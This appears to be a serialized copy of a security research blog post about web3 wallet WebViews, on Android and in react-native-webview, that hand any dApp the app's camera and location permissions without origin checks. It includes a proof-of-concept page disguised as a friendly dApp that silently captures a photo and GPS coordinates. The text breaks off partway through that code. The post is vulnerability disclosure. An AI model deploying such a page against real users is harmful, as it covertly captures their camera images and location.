[{"data":1,"prerenderedAt":158274},["ShallowReactive",2],{"blog-/blog/2026-06-18-goldmine-of-insecure-webview-integrations":3,"featured-blog-posts":2540},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":15,"isFeatured":19,"onBlogPage":19,"tags":20,"body":24,"_type":2534,"_id":2535,"_source":2536,"_file":2537,"_stem":2538,"_extension":2539},"/blog/2026-06-18-goldmine-of-insecure-webview-integrations","blog",false,"","The Goldmine of Insecure WebView Integrations","WebViews in mobile web3 wallets can quietly inherit the permissions granted to the wallet app itself. We found 20+ major wallets where a malicious dApp could access core permissions without authorization.","2026-06-18T12:00:00.000Z",[12,13,14],"bruno","caue","nikolaos",{"src":16,"width":17,"height":18},"/posts/insecure-webview-integrations/title.png",1536,1024,true,[21,22,23],"web3","mobile","webview",{"type":25,"children":26,"toc":2521},"root",[27,35,40,47,52,57,62,69,74,81,106,121,142,156,162,176,184,189,195,200,212,233,407,412,418,423,428,442,449,454,474,2017,2023,2028,2041,2050,2055,2061,2083,2091,2096,2102,2107,2126,2131,2137,2150,2445,2473,2486,2491,2504,2510,2515],{"type":28,"tag":29,"props":30,"children":31},"element","p",{},[32],{"type":33,"value":34},"text","WebViews are everywhere in mobile web3 wallets, but they are often treated as just a convenient way to load dApps. In reality, they can quietly inherit powerful app capabilities that attackers can exploit.",{"type":28,"tag":29,"props":36,"children":37},{},[38],{"type":33,"value":39},"In this article, we look at several WebView issues we found across wallet apps and libraries, including some issues in React Native.",{"type":28,"tag":41,"props":42,"children":44},"h1",{"id":43},"exploiting-mobile-webviews",[45],{"type":33,"value":46},"Exploiting Mobile WebViews",{"type":28,"tag":29,"props":48,"children":49},{},[50],{"type":33,"value":51},"A well known feature of most web3 wallets is the ability to interact with decentralized applications, often referred to as dApps.",{"type":28,"tag":29,"props":53,"children":54},{},[55],{"type":33,"value":56},"For a wallet application to be compatible with various dApps, it must support a message exchange system between the dApp webpage and the underlying wallet. On both Android and iOS, this is often achieved by loading the webpage inside a WebView component.",{"type":28,"tag":29,"props":58,"children":59},{},[60],{"type":33,"value":61},"Since dApps are such a widely supported feature, our main research goal was to uncover lesser known vulnerabilities affecting most - if not all - WebView implementations. One issue we repeatedly encountered is related to how React Native WebView handles permission requests. In order to understand these vulnerabilities and how they can be exploited, we first need to dig into how iOS and Android WebViews actually work.",{"type":28,"tag":63,"props":64,"children":66},"h2",{"id":65},"handling-webview-permissions",[67],{"type":33,"value":68},"Handling WebView permissions",{"type":28,"tag":29,"props":70,"children":71},{},[72],{"type":33,"value":73},"In this section, we'll get into the inner workings of permission requests and how they are handled on Android compared to iOS.",{"type":28,"tag":75,"props":76,"children":78},"h3",{"id":77},"android",[79],{"type":33,"value":80},"Android",{"type":28,"tag":29,"props":82,"children":83},{},[84,86,95,97,104],{"type":33,"value":85},"If we take a look at the Android documentation, the method responsible for granting or denying permission requests is ",{"type":28,"tag":87,"props":88,"children":92},"a",{"href":89,"rel":90},"https://developer.android.com/reference/android/webkit/WebChromeClient#onPermissionRequest(android.webkit.PermissionRequest)",[91],"nofollow",[93],{"type":33,"value":94},"onPermissionRequest",{"type":33,"value":96},". When a new permission request is triggered by a webpage, this method is called with a ",{"type":28,"tag":98,"props":99,"children":101},"code",{"className":100},[],[102],{"type":33,"value":103},"PermissionRequest",{"type":33,"value":105}," object where the WebView developers must decide whether to grant or deny it.",{"type":28,"tag":107,"props":108,"children":109},"blockquote",{},[110],{"type":28,"tag":29,"props":111,"children":112},{},[113,115,119],{"type":33,"value":114},"Notify the host application that web content is requesting permission to access the specified resources and the permission currently isn't granted or denied. The host application must invoke PermissionRequest.grant(String",{"type":28,"tag":116,"props":117,"children":118},"span",{},[],{"type":33,"value":120},") or PermissionRequest.deny(). If this method isn't overridden, the permission is denied.",{"type":28,"tag":29,"props":122,"children":123},{},[124,126,132,134,140],{"type":33,"value":125},"This object contains all the necessary information to evaluate the request, such as the webpage origin with ",{"type":28,"tag":98,"props":127,"children":129},{"className":128},[],[130],{"type":33,"value":131},"getOrigin()",{"type":33,"value":133}," and the requested permissions with ",{"type":28,"tag":98,"props":135,"children":137},{"className":136},[],[138],{"type":33,"value":139},"getResources()",{"type":33,"value":141},".",{"type":28,"tag":29,"props":143,"children":144},{},[145,147,154],{"type":33,"value":146},"If we read the previous Android documentation carefully, we will see that any permission requests are denied by default. For this reason, most WebView wrappers opt to enable permission granting by overwriting this method, such as the official ",{"type":28,"tag":87,"props":148,"children":151},{"href":149,"rel":150},"https://chromium.googlesource.com/chromium/src/+/HEAD/android_webview/tools/system_webview_shell/apk/src/org/chromium/webview_shell/WebViewBrowserFragment.java#644",[91],[152],{"type":33,"value":153},"webview_shell",{"type":33,"value":155},". In this instance, no origin checks are performed.",{"type":28,"tag":75,"props":157,"children":159},{"id":158},"ios",[160],{"type":33,"value":161},"iOS",{"type":28,"tag":29,"props":163,"children":164},{},[165,167,174],{"type":33,"value":166},"On the contrary, iOS ",{"type":28,"tag":87,"props":168,"children":171},{"href":169,"rel":170},"https://developer.apple.com/documentation/webkit/wkuidelegate/webview(_:requestmediacapturepermissionfor:initiatedbyframe:type:decisionhandler:)?language=objc",[91],[172],{"type":33,"value":173},"documentation",{"type":33,"value":175}," states that:",{"type":28,"tag":107,"props":177,"children":178},{},[179],{"type":28,"tag":29,"props":180,"children":181},{},[182],{"type":33,"value":183},"If you don’t implement this method in your delegate, the system returns WKPermissionDecisionPrompt.",{"type":28,"tag":29,"props":185,"children":186},{},[187],{"type":33,"value":188},"This effectively means that by default, iOS determines whether a webpage (bound by its security origin) can access any permission using a prompt message. In this way, origin isolation for permission requests on iOS apps is enforced by default.",{"type":28,"tag":63,"props":190,"children":192},{"id":191},"the-shortcomings-of-webview-implementations",[193],{"type":33,"value":194},"The shortcomings of WebView implementations",{"type":28,"tag":29,"props":196,"children":197},{},[198],{"type":33,"value":199},"Most web3 mobile wallets have an in-app feature that allows users to scan QR codes for a more user-friendly transaction experience. However, to use this feature, the user must grant the app permission to access the camera. Since this is a powerful permission, a pop-up will appear.",{"type":28,"tag":201,"props":202,"children":204},"div",{"style":203},"display:flex; align-items:center; flex-direction:column;",[205],{"type":28,"tag":206,"props":207,"children":211},"img",{"src":208,"alt":209,"style":210},"/posts/insecure-webview-integrations/image1.png","Camera permission prompt","max-height:360px; width:auto; max-width:100%;",[],{"type":28,"tag":29,"props":213,"children":214},{},[215,217,223,225,231],{"type":33,"value":216},"Since most wallets are based on React Native, the most commonly used WebView implementation is ",{"type":28,"tag":98,"props":218,"children":220},{"className":219},[],[221],{"type":33,"value":222},"react-native-webview",{"type":33,"value":224},". If we take a look at how they handle a request that reaches the ",{"type":28,"tag":87,"props":226,"children":229},{"href":227,"rel":228},"https://github.com/react-native-webview/react-native-webview/blob/eb8ccacd35740af39993725ad1b592d45364a510/android/src/main/java/com/reactnativecommunity/webview/RNCWebChromeClient.java#L146",[91],[230],{"type":33,"value":94},{"type":33,"value":232}," method, we see a similar pattern.",{"type":28,"tag":234,"props":235,"children":239},"pre",{"className":236,"code":237,"language":238,"meta":7,"style":7},"language-java shiki shiki-themes slack-dark","// If all the permissions are already granted, send the response to the WebView synchronously\nif (requestedAndroidPermissions.isEmpty()) {\n    request.grant(grantedPermissions.toArray(new String[0]));\n    grantedPermissions = null;\n    return;\n}\n","java",[240],{"type":28,"tag":98,"props":241,"children":242},{"__ignoreMap":7},[243,254,291,359,385,398],{"type":28,"tag":116,"props":244,"children":247},{"class":245,"line":246},"line",1,[248],{"type":28,"tag":116,"props":249,"children":251},{"style":250},"--shiki-default:#6A9955",[252],{"type":33,"value":253},"// If all the permissions are already granted, send the response to the WebView synchronously\n",{"type":28,"tag":116,"props":255,"children":257},{"class":245,"line":256},2,[258,264,270,276,280,286],{"type":28,"tag":116,"props":259,"children":261},{"style":260},"--shiki-default:#C586C0",[262],{"type":33,"value":263},"if",{"type":28,"tag":116,"props":265,"children":267},{"style":266},"--shiki-default:#E6E6E6",[268],{"type":33,"value":269}," (",{"type":28,"tag":116,"props":271,"children":273},{"style":272},"--shiki-default:#9CDCFE",[274],{"type":33,"value":275},"requestedAndroidPermissions",{"type":28,"tag":116,"props":277,"children":278},{"style":266},[279],{"type":33,"value":141},{"type":28,"tag":116,"props":281,"children":283},{"style":282},"--shiki-default:#DCDCAA",[284],{"type":33,"value":285},"isEmpty",{"type":28,"tag":116,"props":287,"children":288},{"style":266},[289],{"type":33,"value":290},"()) {\n",{"type":28,"tag":116,"props":292,"children":294},{"class":245,"line":293},3,[295,300,304,309,314,319,323,328,332,337,343,348,354],{"type":28,"tag":116,"props":296,"children":297},{"style":272},[298],{"type":33,"value":299},"    request",{"type":28,"tag":116,"props":301,"children":302},{"style":266},[303],{"type":33,"value":141},{"type":28,"tag":116,"props":305,"children":306},{"style":282},[307],{"type":33,"value":308},"grant",{"type":28,"tag":116,"props":310,"children":311},{"style":266},[312],{"type":33,"value":313},"(",{"type":28,"tag":116,"props":315,"children":316},{"style":272},[317],{"type":33,"value":318},"grantedPermissions",{"type":28,"tag":116,"props":320,"children":321},{"style":266},[322],{"type":33,"value":141},{"type":28,"tag":116,"props":324,"children":325},{"style":282},[326],{"type":33,"value":327},"toArray",{"type":28,"tag":116,"props":329,"children":330},{"style":266},[331],{"type":33,"value":313},{"type":28,"tag":116,"props":333,"children":334},{"style":260},[335],{"type":33,"value":336},"new",{"type":28,"tag":116,"props":338,"children":340},{"style":339},"--shiki-default:#4EC9B0",[341],{"type":33,"value":342}," String",{"type":28,"tag":116,"props":344,"children":345},{"style":266},[346],{"type":33,"value":347},"[",{"type":28,"tag":116,"props":349,"children":351},{"style":350},"--shiki-default:#B5CEA8",[352],{"type":33,"value":353},"0",{"type":28,"tag":116,"props":355,"children":356},{"style":266},[357],{"type":33,"value":358},"]));\n",{"type":28,"tag":116,"props":360,"children":362},{"class":245,"line":361},4,[363,368,374,380],{"type":28,"tag":116,"props":364,"children":365},{"style":266},[366],{"type":33,"value":367},"    grantedPermissions ",{"type":28,"tag":116,"props":369,"children":371},{"style":370},"--shiki-default:#D4D4D4",[372],{"type":33,"value":373},"=",{"type":28,"tag":116,"props":375,"children":377},{"style":376},"--shiki-default:#569CD6",[378],{"type":33,"value":379}," null",{"type":28,"tag":116,"props":381,"children":382},{"style":266},[383],{"type":33,"value":384},";\n",{"type":28,"tag":116,"props":386,"children":388},{"class":245,"line":387},5,[389,394],{"type":28,"tag":116,"props":390,"children":391},{"style":260},[392],{"type":33,"value":393},"    return",{"type":28,"tag":116,"props":395,"children":396},{"style":266},[397],{"type":33,"value":384},{"type":28,"tag":116,"props":399,"children":401},{"class":245,"line":400},6,[402],{"type":28,"tag":116,"props":403,"children":404},{"style":266},[405],{"type":33,"value":406},"}\n",{"type":28,"tag":29,"props":408,"children":409},{},[410],{"type":33,"value":411},"As we can see above, if the Android app has already been granted access to the requested permissions, this method simply allows the loaded WebView to use them. This follows the same pattern as Google's WebView Shell implementation - no origin checks being performed. When this behavior is now combined with the typical web3 wallet features, namely dApps, a serious oversight arises.",{"type":28,"tag":75,"props":413,"children":415},{"id":414},"real-world-exploitation",[416],{"type":33,"value":417},"Real world exploitation",{"type":28,"tag":29,"props":419,"children":420},{},[421],{"type":33,"value":422},"As mentioned, web3 mobile apps often use a WebView to load and execute dApps, with the most common implementation being React Native WebView. Developers assume that these WebViews, and especially React Native WebView, provide origin isolation by default for sensitive permissions. However, they do not. This allows any malicious dApp to request and use any permission already granted to the underlying application. No additional user consent checks are performed.",{"type":28,"tag":29,"props":424,"children":425},{},[426],{"type":33,"value":427},"If the app doesn’t already have these permissions, once the user allows camera or GPS access for a specific dApp inside the wallet, every other dApp can access those permissions without user consent, since there is no origin isolation.",{"type":28,"tag":29,"props":429,"children":430},{},[431,433,440],{"type":33,"value":432},"During our audits and research, we discovered more than 20 major wallets vulnerable to this attack scenario. While most were using React Native WebView, other less frequently used libraries were suffering from the same bug. One such example is the ",{"type":28,"tag":87,"props":434,"children":437},{"href":435,"rel":436},"https://github.com/Justson/AgentWeb/blob/95d48cd5a03227aa15644c4ef3a65c820b067616/agentweb-core/src/main/java/com/just/agentweb/DefaultChromeClient.java#L250",[91],[438],{"type":33,"value":439},"Justson",{"type":33,"value":441},", used by a popular wallet in the Stellar ecosystem.",{"type":28,"tag":443,"props":444,"children":446},"h4",{"id":445},"proof-of-concept",[447],{"type":33,"value":448},"Proof of Concept",{"type":28,"tag":29,"props":450,"children":451},{},[452],{"type":33,"value":453},"In order to exploit this issue, we assume the following preconditions:",{"type":28,"tag":455,"props":456,"children":457},"ol",{},[458,464,469],{"type":28,"tag":459,"props":460,"children":461},"li",{},[462],{"type":33,"value":463},"The user has already granted the camera permission just to the wallet application or to another dApp with a different origin.",{"type":28,"tag":459,"props":465,"children":466},{},[467],{"type":33,"value":468},"The user is tricked into visiting a malicious dApp or redirected to one from the web.",{"type":28,"tag":459,"props":470,"children":471},{},[472],{"type":33,"value":473},"Once the dApp loads, the following code will run, allowing the attacker to take a picture with the camera.",{"type":28,"tag":234,"props":475,"children":479},{"className":476,"code":477,"language":478,"meta":7,"style":7},"language-html shiki shiki-themes slack-dark","\u003C!DOCTYPE html>\n\u003Chtml>\n\u003Chead>\n    \u003Cmeta charset=\"utf-8\">\n    \u003Ctitle>\u003C/title>\n\u003C/head>\n\u003Cbody>\n    \u003Ch2>Smile dApp :)\u003C/h2>\n    \u003Cbutton id=\"connect\">Connect your wallet!\u003C/button>\n    \u003Cpre id=\"gps\">\u003C/pre>\n    \u003Cimg id=\"pic\">\n    \u003Cscript>\n        window.addEventListener('unhandledrejection', function (event) {\n            alert(`Unhandled Promise Rejection: ${event.reason}`);\n        });\n        window.onerror = function (msg, url, line, col, error) {\n            alert('onerror: ' + msg);\n            return false;\n        };\n\n        async function main() {\n            const stream = await navigator.mediaDevices.getUserMedia({ video: true });\n            const video = document.createElement(\"video\");\n            video.srcObject = stream;\n            const canvas = document.createElement(\"canvas\");\n\n            video.onloadedmetadata = () => {\n                canvas.width = video.videoWidth;\n                canvas.height = video.videoHeight;\n            };\n\n            connect.onclick = e => {\n                video.play();\n\n                canvas.getContext(\"2d\").drawImage(video, 0, 0);\n                stream.getTracks().forEach(t => t.stop());\n                canvas.toBlob((blob) => {\n                    pic.src = URL.createObjectURL(blob);\n                });\n\n                navigator.geolocation.getCurrentPosition(pos => {\n                    const c = pos.coords;\n                    gps.innerText = `Lat: ${c.latitude.toFixed(1)}\\nLon: ${c.longitude.toFixed(1)}`;\n                }, err => alert(err));\n            };\n\n        }\n        main();\n    \u003C/script>\n\u003C/body>\n\u003C/html>\n","html",[480],{"type":28,"tag":98,"props":481,"children":482},{"__ignoreMap":7},[483,507,523,539,571,596,612,629,663,711,748,777,794,845,896,905,979,1009,1027,1036,1045,1069,1135,1179,1210,1252,1260,1292,1332,1370,1379,1387,1423,1446,1454,1518,1578,1618,1666,1675,1683,1727,1762,1894,1930,1938,1946,1955,1968,1985,2001],{"type":28,"tag":116,"props":484,"children":485},{"class":245,"line":246},[486,492,497,502],{"type":28,"tag":116,"props":487,"children":489},{"style":488},"--shiki-default:#808080",[490],{"type":33,"value":491},"\u003C!",{"type":28,"tag":116,"props":493,"children":494},{"style":376},[495],{"type":33,"value":496},"DOCTYPE",{"type":28,"tag":116,"props":498,"children":499},{"style":272},[500],{"type":33,"value":501}," html",{"type":28,"tag":116,"props":503,"children":504},{"style":488},[505],{"type":33,"value":506},">\n",{"type":28,"tag":116,"props":508,"children":509},{"class":245,"line":256},[510,515,519],{"type":28,"tag":116,"props":511,"children":512},{"style":488},[513],{"type":33,"value":514},"\u003C",{"type":28,"tag":116,"props":516,"children":517},{"style":376},[518],{"type":33,"value":478},{"type":28,"tag":116,"props":520,"children":521},{"style":488},[522],{"type":33,"value":506},{"type":28,"tag":116,"props":524,"children":525},{"class":245,"line":293},[526,530,535],{"type":28,"tag":116,"props":527,"children":528},{"style":488},[529],{"type":33,"value":514},{"type":28,"tag":116,"props":531,"children":532},{"style":376},[533],{"type":33,"value":534},"head",{"type":28,"tag":116,"props":536,"children":537},{"style":488},[538],{"type":33,"value":506},{"type":28,"tag":116,"props":540,"children":541},{"class":245,"line":361},[542,547,552,557,561,567],{"type":28,"tag":116,"props":543,"children":544},{"style":488},[545],{"type":33,"value":546},"    \u003C",{"type":28,"tag":116,"props":548,"children":549},{"style":376},[550],{"type":33,"value":551},"meta",{"type":28,"tag":116,"props":553,"children":554},{"style":272},[555],{"type":33,"value":556}," charset",{"type":28,"tag":116,"props":558,"children":559},{"style":266},[560],{"type":33,"value":373},{"type":28,"tag":116,"props":562,"children":564},{"style":563},"--shiki-default:#CE9178",[565],{"type":33,"value":566},"\"utf-8\"",{"type":28,"tag":116,"props":568,"children":569},{"style":488},[570],{"type":33,"value":506},{"type":28,"tag":116,"props":572,"children":573},{"class":245,"line":387},[574,578,583,588,592],{"type":28,"tag":116,"props":575,"children":576},{"style":488},[577],{"type":33,"value":546},{"type":28,"tag":116,"props":579,"children":580},{"style":376},[581],{"type":33,"value":582},"title",{"type":28,"tag":116,"props":584,"children":585},{"style":488},[586],{"type":33,"value":587},">\u003C/",{"type":28,"tag":116,"props":589,"children":590},{"style":376},[591],{"type":33,"value":582},{"type":28,"tag":116,"props":593,"children":594},{"style":488},[595],{"type":33,"value":506},{"type":28,"tag":116,"props":597,"children":598},{"class":245,"line":400},[599,604,608],{"type":28,"tag":116,"props":600,"children":601},{"style":488},[602],{"type":33,"value":603},"\u003C/",{"type":28,"tag":116,"props":605,"children":606},{"style":376},[607],{"type":33,"value":534},{"type":28,"tag":116,"props":609,"children":610},{"style":488},[611],{"type":33,"value":506},{"type":28,"tag":116,"props":613,"children":615},{"class":245,"line":614},7,[616,620,625],{"type":28,"tag":116,"props":617,"children":618},{"style":488},[619],{"type":33,"value":514},{"type":28,"tag":116,"props":621,"children":622},{"style":376},[623],{"type":33,"value":624},"body",{"type":28,"tag":116,"props":626,"children":627},{"style":488},[628],{"type":33,"value":506},{"type":28,"tag":116,"props":630,"children":632},{"class":245,"line":631},8,[633,637,641,646,651,655,659],{"type":28,"tag":116,"props":634,"children":635},{"style":488},[636],{"type":33,"value":546},{"type":28,"tag":116,"props":638,"children":639},{"style":376},[640],{"type":33,"value":63},{"type":28,"tag":116,"props":642,"children":643},{"style":488},[644],{"type":33,"value":645},">",{"type":28,"tag":116,"props":647,"children":648},{"style":266},[649],{"type":33,"value":650},"Smile dApp :)",{"type":28,"tag":116,"props":652,"children":653},{"style":488},[654],{"type":33,"value":603},{"type":28,"tag":116,"props":656,"children":657},{"style":376},[658],{"type":33,"value":63},{"type":28,"tag":116,"props":660,"children":661},{"style":488},[662],{"type":33,"value":506},{"type":28,"tag":116,"props":664,"children":666},{"class":245,"line":665},9,[667,671,676,681,685,690,694,699,703,707],{"type":28,"tag":116,"props":668,"children":669},{"style":488},[670],{"type":33,"value":546},{"type":28,"tag":116,"props":672,"children":673},{"style":376},[674],{"type":33,"value":675},"button",{"type":28,"tag":116,"props":677,"children":678},{"style":272},[679],{"type":33,"value":680}," id",{"type":28,"tag":116,"props":682,"children":683},{"style":266},[684],{"type":33,"value":373},{"type":28,"tag":116,"props":686,"children":687},{"style":563},[688],{"type":33,"value":689},"\"connect\"",{"type":28,"tag":116,"props":691,"children":692},{"style":488},[693],{"type":33,"value":645},{"type":28,"tag":116,"props":695,"children":696},{"style":266},[697],{"type":33,"value":698},"Connect your wallet!",{"type":28,"tag":116,"props":700,"children":701},{"style":488},[702],{"type":33,"value":603},{"type":28,"tag":116,"props":704,"children":705},{"style":376},[706],{"type":33,"value":675},{"type":28,"tag":116,"props":708,"children":709},{"style":488},[710],{"type":33,"value":506},{"type":28,"tag":116,"props":712,"children":714},{"class":245,"line":713},10,[715,719,723,727,731,736,740,744],{"type":28,"tag":116,"props":716,"children":717},{"style":488},[718],{"type":33,"value":546},{"type":28,"tag":116,"props":720,"children":721},{"style":376},[722],{"type":33,"value":234},{"type":28,"tag":116,"props":724,"children":725},{"style":272},[726],{"type":33,"value":680},{"type":28,"tag":116,"props":728,"children":729},{"style":266},[730],{"type":33,"value":373},{"type":28,"tag":116,"props":732,"children":733},{"style":563},[734],{"type":33,"value":735},"\"gps\"",{"type":28,"tag":116,"props":737,"children":738},{"style":488},[739],{"type":33,"value":587},{"type":28,"tag":116,"props":741,"children":742},{"style":376},[743],{"type":33,"value":234},{"type":28,"tag":116,"props":745,"children":746},{"style":488},[747],{"type":33,"value":506},{"type":28,"tag":116,"props":749,"children":751},{"class":245,"line":750},11,[752,756,760,764,768,773],{"type":28,"tag":116,"props":753,"children":754},{"style":488},[755],{"type":33,"value":546},{"type":28,"tag":116,"props":757,"children":758},{"style":376},[759],{"type":33,"value":206},{"type":28,"tag":116,"props":761,"children":762},{"style":272},[763],{"type":33,"value":680},{"type":28,"tag":116,"props":765,"children":766},{"style":266},[767],{"type":33,"value":373},{"type":28,"tag":116,"props":769,"children":770},{"style":563},[771],{"type":33,"value":772},"\"pic\"",{"type":28,"tag":116,"props":774,"children":775},{"style":488},[776],{"type":33,"value":506},{"type":28,"tag":116,"props":778,"children":780},{"class":245,"line":779},12,[781,785,790],{"type":28,"tag":116,"props":782,"children":783},{"style":488},[784],{"type":33,"value":546},{"type":28,"tag":116,"props":786,"children":787},{"style":376},[788],{"type":33,"value":789},"script",{"type":28,"tag":116,"props":791,"children":792},{"style":488},[793],{"type":33,"value":506},{"type":28,"tag":116,"props":795,"children":797},{"class":245,"line":796},13,[798,803,807,812,816,821,826,831,835,840],{"type":28,"tag":116,"props":799,"children":800},{"style":272},[801],{"type":33,"value":802},"        window",{"type":28,"tag":116,"props":804,"children":805},{"style":370},[806],{"type":33,"value":141},{"type":28,"tag":116,"props":808,"children":809},{"style":282},[810],{"type":33,"value":811},"addEventListener",{"type":28,"tag":116,"props":813,"children":814},{"style":370},[815],{"type":33,"value":313},{"type":28,"tag":116,"props":817,"children":818},{"style":563},[819],{"type":33,"value":820},"'unhandledrejection'",{"type":28,"tag":116,"props":822,"children":823},{"style":370},[824],{"type":33,"value":825},", ",{"type":28,"tag":116,"props":827,"children":828},{"style":376},[829],{"type":33,"value":830},"function",{"type":28,"tag":116,"props":832,"children":833},{"style":370},[834],{"type":33,"value":269},{"type":28,"tag":116,"props":836,"children":837},{"style":272},[838],{"type":33,"value":839},"event",{"type":28,"tag":116,"props":841,"children":842},{"style":370},[843],{"type":33,"value":844},") {\n",{"type":28,"tag":116,"props":846,"children":848},{"class":245,"line":847},14,[849,854,858,863,868,872,876,881,886,891],{"type":28,"tag":116,"props":850,"children":851},{"style":282},[852],{"type":33,"value":853},"            alert",{"type":28,"tag":116,"props":855,"children":856},{"style":370},[857],{"type":33,"value":313},{"type":28,"tag":116,"props":859,"children":860},{"style":563},[861],{"type":33,"value":862},"`Unhandled Promise Rejection: ",{"type":28,"tag":116,"props":864,"children":865},{"style":376},[866],{"type":33,"value":867},"${",{"type":28,"tag":116,"props":869,"children":870},{"style":272},[871],{"type":33,"value":839},{"type":28,"tag":116,"props":873,"children":874},{"style":370},[875],{"type":33,"value":141},{"type":28,"tag":116,"props":877,"children":878},{"style":272},[879],{"type":33,"value":880},"reason",{"type":28,"tag":116,"props":882,"children":883},{"style":376},[884],{"type":33,"value":885},"}",{"type":28,"tag":116,"props":887,"children":888},{"style":563},[889],{"type":33,"value":890},"`",{"type":28,"tag":116,"props":892,"children":893},{"style":370},[894],{"type":33,"value":895},");\n",{"type":28,"tag":116,"props":897,"children":899},{"class":245,"line":898},15,[900],{"type":28,"tag":116,"props":901,"children":902},{"style":370},[903],{"type":33,"value":904},"        });\n",{"type":28,"tag":116,"props":906,"children":908},{"class":245,"line":907},16,[909,913,917,922,927,931,935,940,944,949,953,957,961,966,970,975],{"type":28,"tag":116,"props":910,"children":911},{"style":272},[912],{"type":33,"value":802},{"type":28,"tag":116,"props":914,"children":915},{"style":370},[916],{"type":33,"value":141},{"type":28,"tag":116,"props":918,"children":919},{"style":282},[920],{"type":33,"value":921},"onerror",{"type":28,"tag":116,"props":923,"children":924},{"style":370},[925],{"type":33,"value":926}," = ",{"type":28,"tag":116,"props":928,"children":929},{"style":376},[930],{"type":33,"value":830},{"type":28,"tag":116,"props":932,"children":933},{"style":370},[934],{"type":33,"value":269},{"type":28,"tag":116,"props":936,"children":937},{"style":272},[938],{"type":33,"value":939},"msg",{"type":28,"tag":116,"props":941,"children":942},{"style":370},[943],{"type":33,"value":825},{"type":28,"tag":116,"props":945,"children":946},{"style":272},[947],{"type":33,"value":948},"url",{"type":28,"tag":116,"props":950,"children":951},{"style":370},[952],{"type":33,"value":825},{"type":28,"tag":116,"props":954,"children":955},{"style":272},[956],{"type":33,"value":245},{"type":28,"tag":116,"props":958,"children":959},{"style":370},[960],{"type":33,"value":825},{"type":28,"tag":116,"props":962,"children":963},{"style":272},[964],{"type":33,"value":965},"col",{"type":28,"tag":116,"props":967,"children":968},{"style":370},[969],{"type":33,"value":825},{"type":28,"tag":116,"props":971,"children":972},{"style":272},[973],{"type":33,"value":974},"error",{"type":28,"tag":116,"props":976,"children":977},{"style":370},[978],{"type":33,"value":844},{"type":28,"tag":116,"props":980,"children":982},{"class":245,"line":981},17,[983,987,991,996,1001,1005],{"type":28,"tag":116,"props":984,"children":985},{"style":282},[986],{"type":33,"value":853},{"type":28,"tag":116,"props":988,"children":989},{"style":370},[990],{"type":33,"value":313},{"type":28,"tag":116,"props":992,"children":993},{"style":563},[994],{"type":33,"value":995},"'onerror: '",{"type":28,"tag":116,"props":997,"children":998},{"style":370},[999],{"type":33,"value":1000}," + ",{"type":28,"tag":116,"props":1002,"children":1003},{"style":272},[1004],{"type":33,"value":939},{"type":28,"tag":116,"props":1006,"children":1007},{"style":370},[1008],{"type":33,"value":895},{"type":28,"tag":116,"props":1010,"children":1012},{"class":245,"line":1011},18,[1013,1018,1023],{"type":28,"tag":116,"props":1014,"children":1015},{"style":260},[1016],{"type":33,"value":1017},"            return",{"type":28,"tag":116,"props":1019,"children":1020},{"style":376},[1021],{"type":33,"value":1022}," false",{"type":28,"tag":116,"props":1024,"children":1025},{"style":370},[1026],{"type":33,"value":384},{"type":28,"tag":116,"props":1028,"children":1030},{"class":245,"line":1029},19,[1031],{"type":28,"tag":116,"props":1032,"children":1033},{"style":370},[1034],{"type":33,"value":1035},"        };\n",{"type":28,"tag":116,"props":1037,"children":1039},{"class":245,"line":1038},20,[1040],{"type":28,"tag":116,"props":1041,"children":1042},{"emptyLinePlaceholder":19},[1043],{"type":33,"value":1044},"\n",{"type":28,"tag":116,"props":1046,"children":1048},{"class":245,"line":1047},21,[1049,1054,1059,1064],{"type":28,"tag":116,"props":1050,"children":1051},{"style":376},[1052],{"type":33,"value":1053},"        async",{"type":28,"tag":116,"props":1055,"children":1056},{"style":376},[1057],{"type":33,"value":1058}," function",{"type":28,"tag":116,"props":1060,"children":1061},{"style":282},[1062],{"type":33,"value":1063}," main",{"type":28,"tag":116,"props":1065,"children":1066},{"style":370},[1067],{"type":33,"value":1068},"() {\n",{"type":28,"tag":116,"props":1070,"children":1072},{"class":245,"line":1071},22,[1073,1078,1083,1087,1092,1097,1101,1106,1110,1115,1120,1125,1130],{"type":28,"tag":116,"props":1074,"children":1075},{"style":376},[1076],{"type":33,"value":1077},"            const",{"type":28,"tag":116,"props":1079,"children":1080},{"style":272},[1081],{"type":33,"value":1082}," stream",{"type":28,"tag":116,"props":1084,"children":1085},{"style":370},[1086],{"type":33,"value":926},{"type":28,"tag":116,"props":1088,"children":1089},{"style":260},[1090],{"type":33,"value":1091},"await",{"type":28,"tag":116,"props":1093,"children":1094},{"style":272},[1095],{"type":33,"value":1096}," navigator",{"type":28,"tag":116,"props":1098,"children":1099},{"style":370},[1100],{"type":33,"value":141},{"type":28,"tag":116,"props":1102,"children":1103},{"style":272},[1104],{"type":33,"value":1105},"mediaDevices",{"type":28,"tag":116,"props":1107,"children":1108},{"style":370},[1109],{"type":33,"value":141},{"type":28,"tag":116,"props":1111,"children":1112},{"style":282},[1113],{"type":33,"value":1114},"getUserMedia",{"type":28,"tag":116,"props":1116,"children":1117},{"style":370},[1118],{"type":33,"value":1119},"({ ",{"type":28,"tag":116,"props":1121,"children":1122},{"style":272},[1123],{"type":33,"value":1124},"video:",{"type":28,"tag":116,"props":1126,"children":1127},{"style":376},[1128],{"type":33,"value":1129}," true",{"type":28,"tag":116,"props":1131,"children":1132},{"style":370},[1133],{"type":33,"value":1134}," });\n",{"type":28,"tag":116,"props":1136,"children":1138},{"class":245,"line":1137},23,[1139,1143,1148,1152,1157,1161,1166,1170,1175],{"type":28,"tag":116,"props":1140,"children":1141},{"style":376},[1142],{"type":33,"value":1077},{"type":28,"tag":116,"props":1144,"children":1145},{"style":272},[1146],{"type":33,"value":1147}," video",{"type":28,"tag":116,"props":1149,"children":1150},{"style":370},[1151],{"type":33,"value":926},{"type":28,"tag":116,"props":1153,"children":1154},{"style":272},[1155],{"type":33,"value":1156},"document",{"type":28,"tag":116,"props":1158,"children":1159},{"style":370},[1160],{"type":33,"value":141},{"type":28,"tag":116,"props":1162,"children":1163},{"style":282},[1164],{"type":33,"value":1165},"createElement",{"type":28,"tag":116,"props":1167,"children":1168},{"style":370},[1169],{"type":33,"value":313},{"type":28,"tag":116,"props":1171,"children":1172},{"style":563},[1173],{"type":33,"value":1174},"\"video\"",{"type":28,"tag":116,"props":1176,"children":1177},{"style":370},[1178],{"type":33,"value":895},{"type":28,"tag":116,"props":1180,"children":1182},{"class":245,"line":1181},24,[1183,1188,1192,1197,1201,1206],{"type":28,"tag":116,"props":1184,"children":1185},{"style":272},[1186],{"type":33,"value":1187},"            